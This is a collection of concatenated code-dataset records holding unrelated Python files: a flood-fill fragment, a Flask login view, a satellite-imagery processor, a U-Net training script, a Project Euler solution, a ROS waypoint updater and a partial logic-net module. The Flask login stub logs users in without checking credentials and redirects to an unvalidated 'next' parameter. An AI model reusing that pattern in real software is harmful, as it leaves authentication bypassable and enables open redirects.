0\n\t\t#\n\t\tfront = set([elmid])\n\t\twhile len(front) > 0 :\n\t\t\twid = front.pop()\n\t\t\tself.set_value(wid,val,False)\n\t\t\tfor nid in mesh.border_neighbors(deg,wid) :\n\t\t\t\tif (self.value(nid) == old_val) \\\n\t\t\t\t and (self.value(nid) != val) :\n\t\t\t\t\tfront.add(nid)\n\t\tself.emit(SIGNAL(\"fill\"),elmid,val)\n\n\n","sub_path":"Openalea/CPIBOpenAlea/model_output/simviewer_dependent/graph_prop_view.py","file_name":"graph_prop_view.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"258458596","text":"from . 
import app, login_manager\n\n# USER HANDLING\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n # login and validate the user...\n login_user(user)\n flash(\"Logged in successfully.\")\n return redirect(request.args.get(\"next\") or url_for(\"menu\"))\n return render_template(\"login.html\", form=form)\n\n@app.route('/')\ndef index():\n if user.is_active():\n return redirect(url_for(\"menu\"))\n return redirect(url_for(\"login\"))\n\n@app.route('/menu')\n@app.route('/menu/')\n@login_required\ndef menu(screen=\"entrance\"):\n return render_template('menu.html', )","sub_path":"web_hs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"368424495","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2020 Centre National d'Etudes Spatiales (CNES)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"\n###################################################################################################\n#\n# o o\n# oo oo oo o oo ,-.\n# o o o o o o o o o \\_/\n# o o o o o o o o {|||)<\n# o o oooooo o oooooo / \\\n# o o o o o o o o `-^\n# o o o o oooo o o\n#\n###################################################################################################\n\norchestrator.processor.base_processor -- shortdesc\n\norchestrator.processor.base_processor is the base of all processors\n\nIt defines method mandatory for a processor\n\n\n###################################################################################################\n\"\"\"\n\n\nfrom orchestrator.processor.l2_processor import L2Processor\nfrom orchestrator.common.maja_exceptions import MajaChainException\nfrom orchestrator.plugins.common.factory.maja_l1_image_reader_provider import L1ImageReaderProvider\nfrom orchestrator.plugins.common.factory.maja_plugin_provider import MAJAPluginProvider\nfrom orchestrator.plugins.common.factory.maja_l2_image_writer_provider import L2ImageWriterProvider\nimport orchestrator.plugins.common.factory.product_utils as product_utils\nfrom orchestrator.common.earth_explorer.gipp_l2_comm_earth_explorer_xml_file_handler import GippL2COMMEarthExplorerXMLFileHandler\nimport orchestrator.common.gipp_utils as gipp_utils\nfrom orchestrator.common.interfaces.maja_ozone_extract import get_ozone_amount\nimport orchestrator.common.constants as constants\nimport orchestrator.common.date_utils as date_utils\nfrom orchestrator.common.logger.maja_logging import configure_logger\nfrom orchestrator.common.xml_tools import translate_xsl\nfrom orchestrator.common.constants import CAMSStatus\nimport orchestrator.common.file_utils as file_utils\nimport os\nLOGGER = configure_logger(__name__)\n\n\nclass L2NominalProcessor(L2Processor):\n\n def __init__(self, apphandler):\n self._name = \"L2_NOMINAL\"\n self._l1product = None\n super(L2NominalProcessor, self).__init__(apphandler)\n\n def pre_processing(self):\n 
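# locate the L1 input product for this tile and activate the matching satellite plugin\n        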
LOGGER.info(\"Starting Preprocessing\")\n self._l1product = product_utils.get_input_l1_image_product(self._apphandler.get_input_directory(),\n tile_id=self._apphandler.get_tile_id())\n self.init_list_of_sat()\n self.activate_this_sat(self._l1product.Satellite, self._l1product.PluginName, self._l1product.UniqueSatellite)\n\n # Instanciate plugin\n self.plugin = MAJAPluginProvider.create(self._l1product.PluginName, self._apphandler)\n super(L2NominalProcessor, self).pre_processing()\n LOGGER.info(\"Ending Preprocessing\")\n\n def scientific_processing(self):\n LOGGER.info(\"Starting ScientifiqProcessing\")\n l_InitMode = False\n l_BackwardMode = False\n l_Sat = self._l1product.Satellite\n\n \"\"\" ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **\n Get and registers the L2COMM GIPP file L2COMM\n parameters have been read in the L1ImaegFileReader !!\n ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *\"\"\"\n l_GIP_L2COMM_Filename = gipp_utils.get_gipp_filename_with_mission(self._apphandler.get_input_directory(),\n \"GIP_L2COMM\", l_Sat)\n\n if self._apphandler._stylesheet is not None:\n LOGGER.debug(\"Overloading L2COMM parameters...\")\n l_GIP_L2COMM_Filename = file_utils.copy_file_to_directory(l_GIP_L2COMM_Filename,\n self._apphandler.get_working_directory(), notestmode=True)\n translate_xsl(l_GIP_L2COMM_Filename, self._apphandler._stylesheet)\n\n\n LOGGER.info(\n \"The GIP_L2COMM file detected for the satellite '\" + l_Sat + \"' is <\" + l_GIP_L2COMM_Filename + \">.\")\n l_GIPPL2COMMHandler = GippL2COMMEarthExplorerXMLFileHandler(l_GIP_L2COMM_Filename)\n \"\"\" ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **\n Register the GIPP file \"GIP_L2SITE\" */\n ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *\"\"\"\n l_GIP_L2SITE_Filename = gipp_utils.get_gipp_filename_with_mission(self._apphandler.get_input_directory(),\n \"GIP_L2SITE\",\n self._l1product.UniqueSatellite)\n\n if self._apphandler._stylesheet is not None:\n LOGGER.debug(\"Overloading L2SITE parameters...\")\n l_GIP_L2SITE_Filename = file_utils.copy_file_to_directory(l_GIP_L2SITE_Filename,\n self._apphandler.get_working_directory(), notestmode=True)\n translate_xsl(l_GIP_L2SITE_Filename, self._apphandler._stylesheet)\n\n\n LOGGER.info(\n \"The GIP_L2SITE file detected for the satellite '\" +\n self._l1product.UniqueSatellite +\n \"' is <\" +\n l_GIP_L2SITE_Filename +\n \">.\")\n\n # Get the athmospheric/CAMS\n # ---------------------------------------------------------------------------------------------\n if l_GIPPL2COMMHandler.get_value_b(\"UseCamsData\"):\n l_modelList = l_GIPPL2COMMHandler.get_value(\"ListOfModels\").split()\n l_avgTime = date_utils.get_julianday_as_double(self._l1product.ProductDate)\n LOGGER.info(\"Cams data requested\")\n # Verify if cams file are available before anything\n if self._CAMS_Files_HandlersMAP[l_Sat].has_cams_data(l_avgTime):\n self._CAMS_Files_HandlersMAP[l_Sat].extract_cams_datas(self._l1product.CenterCorner.latitude,\n self._l1product.CenterCorner.longitude,\n l_avgTime)\n if self._CAMS_Files_HandlersMAP[l_Sat].valid:\n self._AthmosphericLutHandlerMap[l_Sat].set_proportions(\n self._CAMS_Files_HandlersMAP[l_Sat].proportions)\n LOGGER.info(\"CAMS found, sampling : \" + str(self._CAMS_Files_HandlersMAP[l_Sat].out_rh_sampling))\n for m in l_modelList:\n l_use_rh = 
self._CAMS_Files_HandlersMAP[l_Sat].get_extinction_map()[m][\"rh_dep\"]\n self._AthmosphericLutHandlerMap[l_Sat].add_lut_for_model(\n self._apphandler.get_input_directory(),\n self._apphandler.get_working_directory(),\n l_Sat,\n m,\n self._validate_schemas,\n os.path.join(\n self._apphandler.get_schemas_root_install_dir(),\n self.plugin.MAJA_INSTALL_SCHEMAS_DIR),\n p_userh=l_use_rh,\n p_rh=self._CAMS_Files_HandlersMAP[l_Sat].out_rh_sampling)\n tmp_atmolut = self._apphandler.get_directory_manager().get_temporary_directory(\"AtmoLut_\", do_always_remove=True)\n self._AthmosphericLutHandlerMap[l_Sat].gen_synthetised_luts(tmp_atmolut)\n self._cams_status = CAMSStatus.ACTIVATED_OK\n else:\n LOGGER.warn(\"No valid cam data found for product, using constant model\")\n self._cams_status = CAMSStatus.ACTIVATED_NOAVAILABLEDATA\n else:\n LOGGER.warn(\"No valid cam data found for product at time \"+ date_utils.get_date_yyyymmdd_from_tm(self._l1product.ProductDate)+\", using constant model\")\n self._cams_status = CAMSStatus.ACTIVATED_NOAVAILABLEDATA\n\n # ---------------------------------------------------------------------------------------------\n # Initialize L1 image reader\n l_UniqueSatelliteD = self._l1product.UniqueSatellite\n l1_image_reader = L1ImageReaderProvider.create(\n self._l1product.PluginName,\n self._l1product,\n self._apphandler,\n l_GIPPL2COMMHandler,\n self.DataDEMMap.get(l_UniqueSatelliteD),\n constants.ReadL1Mode.READ_L1_MODE_FOR_ALGORITHMS)\n\n # ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **\n # Initialize the L2 Image file reader\n # Only in Nominal and Backward mode\n # ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **\n LOGGER.debug(\n \"Starting L2NominalProcessor::ScientificProcessing(): get the L2 product filename in the input directory...\")\n l2_image_reader = product_utils.get_input_l2_image_product(\n self._apphandler.get_input_directory(), self._apphandler, False, self.DataDEMMap.get(l_UniqueSatelliteD))\n LOGGER.info(\"The L2 product found is <\" + l2_image_reader.ProductFilename + \">.\")\n\n # ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **\n # Initialize the Output L2 Image product filename\n if self._apphandler.get_output_plugin() is not None:\n l2_image_file_writer = L2ImageWriterProvider.create(self._apphandler.get_output_plugin())\n else:\n l2_image_file_writer = L2ImageWriterProvider.create(MAJAPluginProvider.auto_tm(self._l1product.PluginName))\n if not l2_image_file_writer.can_write(self._l1product.PluginName):\n raise MajaChainException(\n \"Plugin '\" + self._apphandler.get_output_plugin() + \"' can not write product from '\" + self._l1product.PluginName + \"' products \")\n\n # ---------------------------------------------------------------------------------------------\n # Get the ozone value\n l_UseDefaultConstantOzoneAmount = self.plugin.ConfigUserCamera.get_Algorithms(). 
\\\n get_Atmospheric_Absorption_Correction().get_Use_Default_Constant_Ozone_Amount()\n # l_UseDefaultConstantOzoneAmount = True\n l_OzoneAmountValue = 0.0\n if not l_UseDefaultConstantOzoneAmount:\n l_OzoneAmountValue = get_ozone_amount(\n gipp_utils.get_gipp_filename(self._apphandler.get_input_directory(), \"EXO_METDTA\"),\n self._l1product.CenterCorner)\n else:\n l_OzoneAmountValue = float(l_GIPPL2COMMHandler.l2_comm_values[\"OzoneAmountDefaultValue\"])\n LOGGER.info(\"The 'OzoneAmount' used is \" + str(l_OzoneAmountValue))\n\n # Log system infos\n LOGGER.info(self._apphandler.get_system_infos())\n\n # check conditional clouds ?\n self._checking_conditional_clouds = True\n LOGGER.info(\"Starting from L2InitProcessor, the main ScientificSingleProductProcessing() method...\")\n l_enableL2resolution = self._apphandler.get_user_conf().get_Computing().get_EnableL2ResolutionProcessing()\n super(L2NominalProcessor, self).process_one_product(l_InitMode, l_BackwardMode, l_enableL2resolution,\n False, True, True, self._l1product, l1_image_reader,\n l_OzoneAmountValue, self._cams_status, l2_image_reader,\n l2_image_file_writer)\n LOGGER.info(\"Ending ScientifiqProcessing\")\n # Log system infos\n LOGGER.info(self._apphandler.get_system_infos())\n\n def post_processing(self):\n LOGGER.info(\"Starting Postprocessing\")\n","sub_path":"orchestrator/processor/l2_nominal_processor.py","file_name":"l2_nominal_processor.py","file_ext":"py","file_size_in_byte":12751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"272059984","text":"#!/usr/bin/env python\n\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\n\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.backend import int_shape\nfrom tensorflow.keras.layers import Concatenate, Conv2D, Conv2DTranspose, Cropping2D, Input, MaxPooling2D, SeparableConv2D\n\n# https://idiotdeveloper.com/unet-implementation-in-tensorflow-using-keras-api/\n\ndef conv_block(input_, num_filters):\n\tx = SeparableConv2D(num_filters, 3, activation=\"relu\")(input_)\n\tx = SeparableConv2D(num_filters, 3, activation=\"relu\")(x)\n\n\treturn x\n\ndef encoder_block(input_, num_filters):\n\tx = conv_block(input_, num_filters)\n\n\treturn MaxPooling2D()(x), x\n\ndef cropping_margins(src_shape, target_shape):\n\t# https://github.com/karolzak/keras-unet/blob/9b7aff5247fff75dc4e2a11ba9c45929b9166d1f/keras_unet/models/vanilla_unet.py\n\n\tdelta_h = src_shape[1] - target_shape[1]\n\n\ttop_crop = delta_h // 2\n\tbottom_crop = delta_h // 2 if delta_h % 2 == 0 else delta_h // 2 + 1\n\n\tdelta_w = src_shape[2] - target_shape[2]\n\n\tleft_crop = delta_w // 2\n\tright_crop = delta_w // 2 if delta_w % 2 == 0 else delta_w // 2 + 1\n\n\treturn ((top_crop, bottom_crop), (left_crop, right_crop))\n\n\ndef decoder_block(input_, skipped_features, num_filters):\n\tx = Conv2DTranspose(num_filters, (2, 2), strides=2)(input_)\n\tcropped = Cropping2D(cropping=cropping_margins(int_shape(skipped_features), int_shape(x)))(skipped_features)\n\tx = Concatenate()([x, cropped])\n\tx = conv_block(x, num_filters)\n\n\treturn x\n\ndef get_model(input_shape, output_channels):\n\tinputs = Input(input_shape)\n\n\tassert input_shape[0] >= 140 and (input_shape[0] - 124) % 16 == 0, \"Input width must be of the form 16x + 124\"\n\tassert input_shape[1] >= 140 and (input_shape[1] - 124) % 16 == 0, \"Input height must be of the form 16x + 124\"\n\n\te1, s1 = encoder_block(inputs, 64)\n\te2, s2 = encoder_block(e1, 128)\n\te3, s3 = encoder_block(e2, 
256)\n\te4, s4 = encoder_block(e3, 512)\n\n\tbridge = conv_block(e4, 1024)\n\n\td1 = decoder_block(bridge, s4, 512)\n\td2 = decoder_block(d1, s3, 256)\n\td3 = decoder_block(d2, s2, 128)\n\td4 = decoder_block(d3, s1, 64)\n\n\toutputs = Conv2D(output_channels, 1, activation=\"sigmoid\")(d4)\n\n\treturn Model(inputs=inputs, outputs=outputs)\n\n# https://www.tensorflow.org/tutorials/images/segmentation\n\ndataset, info = tfds.load(\"oxford_iiit_pet:3.*.*\", with_info=True)\n\n# https://www.tensorflow.org/guide/data_performance\n\n# At the bottom of the U-Net (after the last convolution that bridges the encoder and decoder), the\n# image has the most features and the lowest resolution.\nMINIMUM_SHAPE = (12, 12)\n\nINPUT_SHAPE = (MINIMUM_SHAPE[0] * 16 + 124, MINIMUM_SHAPE[1] * 16 + 124)\nOUTPUT_SHAPE = (MINIMUM_SHAPE[0] * 16 - 60, MINIMUM_SHAPE[1] * 16 - 60)\n\ndef load_datapoint(datapoint, random_flip=False):\n\tinput_image = tf.image.resize(datapoint[\"image\"], OUTPUT_SHAPE)\n\tinput_image = tf.cast(input_image, tf.float32) / 255\n\tinput_image = tf.pad(input_image, ((92, 92), (92, 92), (0, 0)), mode=\"SYMMETRIC\")\n\tinput_mask = tf.image.resize(datapoint[\"segmentation_mask\"], OUTPUT_SHAPE)\n\n\tif random_flip and tf.random.uniform(()) > 0.5:\n\t\tinput_image = tf.image.flip_left_right(input_image)\n\t\tinput_mask = tf.image.flip_left_right(input_mask)\n\n\t# The dataset's labels are within {1, 2, 3}, but the sparse categorical crossentropy loss\n\t# function expects them to be within [0, 3)\n\tinput_mask -= 1\n\n\treturn input_image, input_mask\n\nBATCH_SIZE = 6\n\ntrain_dataset = (dataset[\"train\"]\n\t.map(lambda d: load_datapoint(d, True), num_parallel_calls=tf.data.AUTOTUNE)\n\t.cache()\n\t.shuffle(16) # https://datascience.stackexchange.com/a/89319\n\t.batch(BATCH_SIZE)\n\t.repeat() # https://www.gcptutorials.com/article/how-to-use-tf.data.Dataset.repeat\n\t.prefetch(buffer_size=tf.data.AUTOTUNE))\n\ntest_dataset = (dataset[\"test\"]\n\t.map(load_datapoint)\n\t.batch(BATCH_SIZE))\n\nmodel = get_model((INPUT_SHAPE[0], INPUT_SHAPE[1], 3), 3)\nmodel.compile(\n\toptimizer=\"adam\",\n\tloss=\"sparse_categorical_crossentropy\", # https://stackoverflow.com/questions/58565394/what-is-the-difference-between-sparse-categorical-crossentropy-and-categorical-c\n\tmetrics=\"accuracy\")\n\nmodel.summary()\n\nCHECKPOINT_PATH = \"weights/cp.ckpt\"\n\n# https://www.tensorflow.org/tutorials/keras/save_and_load\ntry:\n\tmodel.load_weights(CHECKPOINT_PATH)\nexcept:\n\tprint(\"No weights were loaded.\")\n\nmodel.fit(\n\ttrain_dataset,\n\tepochs=20,\n\tcallbacks=[tf.keras.callbacks.ModelCheckpoint(\n\t\tfilepath=\"weights/cp.ckpt\",\n\t\tsave_weights_only=True,\n \tverbose=1)],\n\tvalidation_data=test_dataset,\n\tsteps_per_epoch=info.splits['train'].num_examples // BATCH_SIZE,\n\tvalidation_steps=info.splits[\"test\"].num_examples)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"247398601","text":"from func import primes\n\n__author__ = \"Bungogood\"\n\n'''\nProblem 3\n\nLargest prime factor\n'''\n\ndef f():\n largest = 1\n n = 600851475143\n for p in primes():\n while n % p == 0:\n largest = p\n n /= p\n if n == 1:\n break\n return p\n\nif __name__ == \"__main__\":\n 
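# expected output: 6857, the largest prime factor of 600851475143\n    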
print(f())","sub_path":"Problem-003.py","file_name":"Problem-003.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"325947710","text":"#!/usr/bin/env python\n\nimport rospy\nfrom geometry_msgs.msg import PoseStamped, TwistStamped\nfrom styx_msgs.msg import Lane, Waypoint, TrafficLightArray, TrafficLight\nfrom std_msgs.msg import Int32\nimport math\n\n'''\nThis node will publish waypoints from the car's current position to some `x` distance ahead.\n\nAs mentioned in the doc, you should ideally first implement a version which does not care\nabout traffic lights or obstacles.\n\nOnce you have created dbw_node, you will update this node to use the status of traffic lights too.\n\nPlease note that our simulator also provides the exact location of traffic lights and their\ncurrent status in `/vehicle/traffic_lights` message. You can use this message to build this node\nas well as to verify your TL classifier.\n\nTODO (for Yousuf and Aaron): Stopline location for each traffic light.\n'''\n\nLOOKAHEAD_WPS = 200 # Number of waypoints we will publish. You can change this number\n\n\nclass WaypointUpdater(object):\n def __init__(self):\n rospy.init_node('waypoint_updater')\n rospy.Subscriber('/current_velocity', TwistStamped, self.current_velocity_cb)\n rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)\n print(\"Subscriptions completed\")\n self.count = 0\n #\n # Define a place to store the waypoints\n self.wps = None\n # Define a variable to define the previous waypoint of the car\n self.wp_index = None\n # TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below\n rospy.Subscriber('/traffic_waypoint', Int32, self.traffic_cb)\n self.final_waypoints_pub = rospy.Publisher('final_waypoints', Lane, queue_size=1)\n self.speed_limit = rospy.get_param('/waypoint_loader/velocity', 80.46)\n self.speed_limit = self.speed_limit * 1000 / 3600. 
# m/s\n        # TODO: Add other member variables you need below\n        self.lightindx = -0x7FFFFFFF\n        self.stop = False\n        self.isYellow = False\n        self.current_linear_velocity = None\n        self.current_angular_velocity = None\n        self.lasta = 0.0\n        self.frameno = 0\n        # New\n        self.stop_accel = 0.0\n        self.stop_v = 0.0\n        rospy.spin()\n\n    def current_velocity_cb(self, msg):\n        #rospy.loginfo('Current Velocity Received...')\n        self.current_linear_velocity = msg.twist.linear.x\n        self.current_angular_velocity = msg.twist.angular.x\n\n    def pose_cb(self, msg):\n        if self.wps == None: return\n        self.count += 1\n        # x, y, and z give the current position from the pose message\n        x = msg.pose.position.x\n        y = msg.pose.position.y\n        z = msg.pose.position.z\n\n        # if the previous waypoint of the car is unknown, find the best one\n        if self.wp_index == None:\n            mindist = 1000000.0\n            bestind = None\n            for i in range(len(self.wps)):\n                xw = self.wps[i].pose.pose.position.x\n                yw = self.wps[i].pose.pose.position.y\n                zw = self.wps[i].pose.pose.position.z\n                dist = math.sqrt((x-xw)**2+(y-yw)**2+(z-zw)**2)\n                if dist < mindist:\n                    bestind = i\n                    mindist = dist\n            self.wp_index = bestind\n        else:\n            # Otherwise, increment the index to find the closest waypoint\n            bestind = self.wp_index\n            i = bestind\n            xw = self.wps[i].pose.pose.position.x\n            yw = self.wps[i].pose.pose.position.y\n            zw = self.wps[i].pose.pose.position.z\n            mindist = math.sqrt((x-xw)**2+(y-yw)**2+(z-zw)**2)\n            while True:\n                i += 1\n                if i >= len(self.wps): i = 0\n                xw = self.wps[i].pose.pose.position.x\n                yw = self.wps[i].pose.pose.position.y\n                zw = self.wps[i].pose.pose.position.z\n                dist = math.sqrt((x-xw)**2+(y-yw)**2+(z-zw)**2)\n                if dist > mindist: break\n                mindist = dist\n                bestind = i\n        # Make sure that the closest waypoint selected is in front of the car, not behind it!\n        # Calculate the changes in x and y from the closest waypoint to the waypoint 10 ahead\n        index10 = bestind + 10\n        if index10 >= len(self.wps): index10 -= len(self.wps)\n        dx = self.wps[index10].pose.pose.position.x - \\\n            self.wps[bestind].pose.pose.position.x\n        dy = self.wps[index10].pose.pose.position.y - \\\n            self.wps[bestind].pose.pose.position.y\n        # If the change in x is greater, compare best waypoint x with the position x\n        # Increment bestind until the sign of the change in x to advance 10 waypoints\n        # matches the sign of the change in x to move from the position x to the best wp\n        if abs(dx) > abs(dy):\n            if dx > 0.0: sign = 1\n            else: sign = -1\n            while True:\n                dx = self.wps[bestind].pose.pose.position.x - x\n                if dx > 0.0: signb = 1\n                else: signb = -1\n                if sign == signb: break\n                bestind += 1\n                if bestind >= len(self.wps): bestind = 0\n        # If the change in y is greater, compare best waypoint y with the position y\n        # Increment bestind until the sign of the changes in y to advance 10 waypoints\n        # matches the sign of the change in y to move from the position y to the best wp\n        else:\n            if dy > 0.0: sign = 1\n            else: sign = -1\n            while True:\n                dy = self.wps[bestind].pose.pose.position.y - y\n                if dy > 0.0: signb = 1\n                else: signb = -1\n                if sign == signb: break\n                bestind += 1\n                if bestind >= len(self.wps): bestind = 0\n        self.wp_index = bestind\n        # if (self.count < 3):\n        #     print(\"Best waypoint\", bestind, self.wps[bestind].pose.pose.position.x, \\\n        #           self.wps[bestind].pose.pose.position.y, \\\n        #           self.wps[bestind].pose.pose.position.z)\n        # Update the velocities of the waypoints from the bestind to bestind + LOOKAHEAD_WPS - 1\n        # for now, use 10.0 m/s (about 22 MPH)\n        i = bestind\n        if self.current_linear_velocity != None:\n            lastspeed = self.current_linear_velocity\n        else:\n            lastspeed = self.wps[bestind].twist.twist.linear.x\n        # Calculate acceleration (in the reverse direction) to stop the car\n        # before the next red (or yellow?) traffic light\n        \n        # if (self.count & 0x3f) == 0: print \"lightindx\", self.lightindx, self.wp_index, \\\n        #    self.lasta\n        if self.lightindx > 0:\n            stoptarget = self.lightindx - 5\n            if stoptarget < 0: stoptarget += len(self.wps)\n            xw = self.wps[i].pose.pose.position.x\n            yw = self.wps[i].pose.pose.position.y\n            \n            dxl = self.wps[stoptarget].pose.pose.position.x-xw\n            dyl = self.wps[stoptarget].pose.pose.position.y-yw\n            s = math.sqrt(dxl*dxl + dyl*dyl)\n            # Calculate difference i - light waypoint with wraparound\n            di = i - stoptarget\n            if di < 0: di += len(self.wps)\n            if (s < 0.01): a = 9.0\n            else:\n                a = lastspeed * lastspeed / (s + s) #(s + s) + 1.5\n                if a > 9.0: a = 9.0\n        else: a = 0.0\n        count = LOOKAHEAD_WPS\n        finalwps = []\n        v = lastspeed\n        nexti = i + 1\n        if nexti >= len(self.wps): nexti = 0\n        if (a > 4.0) and not(self.isYellow and a >= 6.0):\n            if not self.stop:\n                self.stop_accel = a\n                self.stop_v = v\n                self.stop = True\n        if self.stop:\n            self.stop_v -= 0.02 * self.stop_accel\n            if self.stop_v < 0.0: self.stop_v = 0.0\n\n        while True:\n            if not self.stop:\n                self.wps[i].twist.twist.linear.x = self.speed_limit #22.352\n            else:\n                xw = self.wps[i].pose.pose.position.x\n                yw = self.wps[i].pose.pose.position.y\n                dx = self.wps[nexti].pose.pose.position.x-xw\n                dy = self.wps[nexti].pose.pose.position.y-yw\n                d = math.sqrt(dx * dx + dy * dy)\n                if v > .01: v -= (a + 1.0) * d/v\n                else: v = 0.0\n                if v < 0.0: v = 0.0\n                if (i >= stoptarget) and (i <= self.lightindx): v = 0.0\n                if self.stop_v < v: v = self.stop_v\n                self.wps[i].twist.twist.linear.x = v\n            finalwps += [self.wps[i]]\n            count -= 1\n            if count == 0: break\n            i += 1\n            if i == len(self.wps): i = 0\n        # Publish\n        self.lasta = a\n        lane = Lane()\n        lane.header.frame_id='/final'\n        lane.header.stamp = rospy.Time(0)\n        lane.waypoints = finalwps\n        self.final_waypoints_pub.publish(lane)\n\n    def waypoints_cb(self, lane):\n        self.wps = lane.waypoints\n\n    def traffic_cb(self, msg):\n        if msg.data != -0x7FFFFFFF:\n            if msg.data < 0:\n                self.lightindx = -msg.data\n                self.isYellow = True\n            else:\n                self.isYellow = False\n                self.lightindx = msg.data\n        else:\n            self.stop = False\n            self.lightindx = -0x7FFFFFFF\n\n    def obstacle_cb(self, msg):\n        # TODO: Callback for /obstacle_waypoint message. 
We will implement it later\n pass\n\n def get_waypoint_velocity(self, waypoint):\n return waypoint.twist.twist.linear.x\n\n def set_waypoint_velocity(self, waypoints, waypoint, velocity):\n waypoints[waypoint].twist.twist.linear.x = velocity\n\n def distance(self, waypoints, wp1, wp2):\n dist = 0\n dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)\n for i in range(wp1, wp2+1):\n dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)\n wp1 = i\n return dist\n\n\nif __name__ == '__main__':\n try:\n WaypointUpdater()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start waypoint updater node.')\n","sub_path":"ros/src/waypoint_updater/waypoint_updater.py","file_name":"waypoint_updater.py","file_ext":"py","file_size_in_byte":10359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"645030910","text":"# This KF will overhaul the design of analytical functions, because the old implementation\n# has some restrictions and is not complete.\n# Now two watch list will be added, one for AND and one for OR. A new integrity condition\n# will be enforced on KF as to how AND and OR operands are placed. This integrity condition\n# does not restrict the expressiveness of the net, and it renders convenient propreties of\n# AND and OR nodes.\n# One possible problem is that this will be a strictly first-order implementation, which\n# means I need to rethink how higher order logic is implemented. Hopefully there is no\n# problem.\n\n\n\nimport networkx\nfrom networkx import DiGraph\n\n\nclass Percipi(object):\n def __init__(self):\n pass\n\n\nclass Vision(Percipi):\n def __init__(self,id=\"\"):\n self.data = None\n self.id=id\n\n def get_data(self):\n return self.data\n\n def __repr__(self):\n return self.id\n\nclass Predicate(object):\n def __init__(self, KF=None, id=\"\"):\n self.KF = KF\n self.id = id\n self.function = None\n\n def predicate_type(self):\n return None\n\n def eval(self):\n return None\n\n def eval_add_edge(self):\n if self.eval() == True:\n self.KF.add_edge(self.KF.get_instance(), self, method=self)\n\n def get_eval_method(self):\n return None\n\n def predicate_type(self):\n return type(self).__name__\n\n def __repr__(self):\n if self.id != None:\n return self.id\n else:\n return super(Predicate, self).__repr__()\n\n\nclass AND(Predicate):\n def __init__(self, KF, predicate_set, id=None):\n super(AND, self).__init__(KF, id)\n self.predicate_set = predicate_set\n self.KF.add_edges_from([(self, i) for i in predicate_set])\n\n\nclass OR(Predicate):\n def __init__(self, KF, predicate_set, id=None):\n super(OR, self).__init__(KF, id)\n self.predicate_set = predicate_set\n self.KF.add_edges_from([(i, self) for i in predicate_set])\n\nclass Watch():\n def __init__(self, KF, AND_OR):\n self.KF = KF\n self.AND_OR = AND_OR\n self.leftover_set = self.AND_OR.predicate_set.copy()\n\n def remove(self, predicate):\n self.leftover_set.remove(predicate)\n\n def is_complete(self):\n # print(\"AND_OR set: should not be changed:\",self.AND_OR.predicate_set)\n return not self.leftover_set\n\n def get_AND_OR(self):\n return self.AND_OR\n\n def __copy__(self):\n # Should copy the predicate_set, right?\n return Watch(self.KF,self.AND_OR)\n\n\nclass Analytical(Predicate):\n def __init__(self, KF, function, predicate_tuple, id=None, method=1):\n super(Analytical, self).__init__(KF, id)\n self.function = function\n self.predicate_tuple = predicate_tuple\n self.method = method\n\n def 
get_eval_method(self):\n return (self.function, self.predicate_tuple)\n\n def eval(self):\n newlist = ()\n if self.method == 1:\n for i in self.predicate_tuple:\n newlist += (self.KF.hybrid_eval_I(i),)\n elif self.method == 2:\n for i in self.predicate_tuple:\n newlist += (self.KF.dynamic_eval(i),)\n else:\n raise Exception(\"Unknown proof method.\")\n return self.function(*newlist)\n # assert boolean\n # note that this eval will call hybrid_eval()\n\n\nclass Empirical_Obsolete(Predicate):\n # I am losing my sanity here.\n\n def __init__(self, neural_network):\n self.neural_network = neural_network\n\n def get(self):\n return self.neural_network\n\n def eval(self, input):\n return self.neural_network(input)\n\n\nclass Empirical(Analytical):\n def __init__(self, KF, neural_network, id=None):\n super(Empirical, self).__init__(KF, id)\n self.neural_network = neural_network\n # At the moment I will only allow neural network to directly operate upon raw data.\n self.predicatelist = (KF.get_instance())\n\n\nclass 